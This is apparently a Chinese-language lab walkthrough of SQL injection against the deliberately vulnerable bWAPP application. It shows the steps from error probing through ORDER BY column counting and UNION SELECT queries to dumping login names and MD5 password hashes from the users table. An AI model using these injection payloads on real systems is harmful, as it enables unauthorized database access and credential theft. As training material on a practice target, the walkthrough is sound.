我们进行测试这里是否存在SQL注入漏洞
输入a'
搜索后
报错了,说明很大可能存在SQL注入漏洞了。
0x02:爆字段(字段就是这个数据表中得列)order by 语句
输入 a' order by 1 #
输入a' order by 7#
输入a' order by 8#
由此可以判断出,库中有7个列。
0x03:爆数据库名使用联合查询注入union
输入a' union select 1,2,3,4,5,6,7#
可以看出是从2开始显示。
可以将2,3,5,4,替换成我们想要查询得信息
相关函数system_user() 系统用户名
user() 用户名
current_user 当前用户名
session_user() 连接数据库得用户名
database() 数据库名
version() MYSQL数据库版本
load_file() MYSQL读取本地文件得函数
等等datadir 读取数据库路径
等等basedir MYSQL 安装路径
等等version_compile_os 操作系统
输入a' union select 1,database(),3,4,5,6,7#
可见当前数据库为bwapp
0x04:爆表(即获取当前数据表)输入a' union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=database()#
当前数据库(bwapp)中,有五张表,其中users比较重要。
0x05:获取后台账户用户名和密码先查看users表得所有得列得信息
输入a' union select 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='users'#
一共有9列。
其中得login和password,应该是我们有我们想要得东西。
那我们就去查出它们得信息
输入a' union select 1,login,password,4,5,6,7 from users#
获取login信息和password密码
其中密码是经过md5加密,我们需要去解密






